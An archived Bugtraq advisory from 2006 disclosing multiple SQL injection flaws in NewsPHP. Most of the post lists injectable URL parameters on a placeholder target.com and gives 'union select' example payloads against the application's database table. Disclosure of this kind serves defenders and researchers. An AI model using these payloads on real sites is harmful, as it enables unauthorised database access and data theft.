Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Newsphp Multiple SQL Injection Vulnerabilities
From: s3ude () securityfocus com, hotmail.com () securityfocus com (at)
Date: 22 Jan 2006 18:50:35 -0000
Software: NewsPHP 
Web Site: http://www.newsphp.com
Versions: All
Type: Multiple SQL Injection 
Class: Remote

Exploit :

1-

http://www.target.com/index.php?discuss=SQL

2-

http://www.target.com/index.php?tim=SQL

3-

http://www.target.com/index.php?id=SQL

4-

http://www.target.com/index.php?words=%20&where=1&limit=40&last=SQL

5-

http://www.target.com/index.php?words=%20&where=1&limit=SQL

6-

http://www.target.com/index.php?words=&where=1&submitted=true&address=E-mail+Address&action=add&rate=5&id=(SQL)&article_rate=Rate

Example :

1-

http://www.target.com/ndex.php?id=-99 union select null,null,null,null,null,null,null,null,null from newsphp.pro/*

2-

http://www.target.com/index.php?tim=-1 union select null,null,null,null,null,null,null,null,null from newsphp.pro/*

Discovered by: SAUDI

L-G-H Team

http://www.lezr.com

Regards ///

  By Date           By Thread  

Current thread:
  • Newsphp Multiple SQL Injection Vulnerabilities at (Jan 26)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]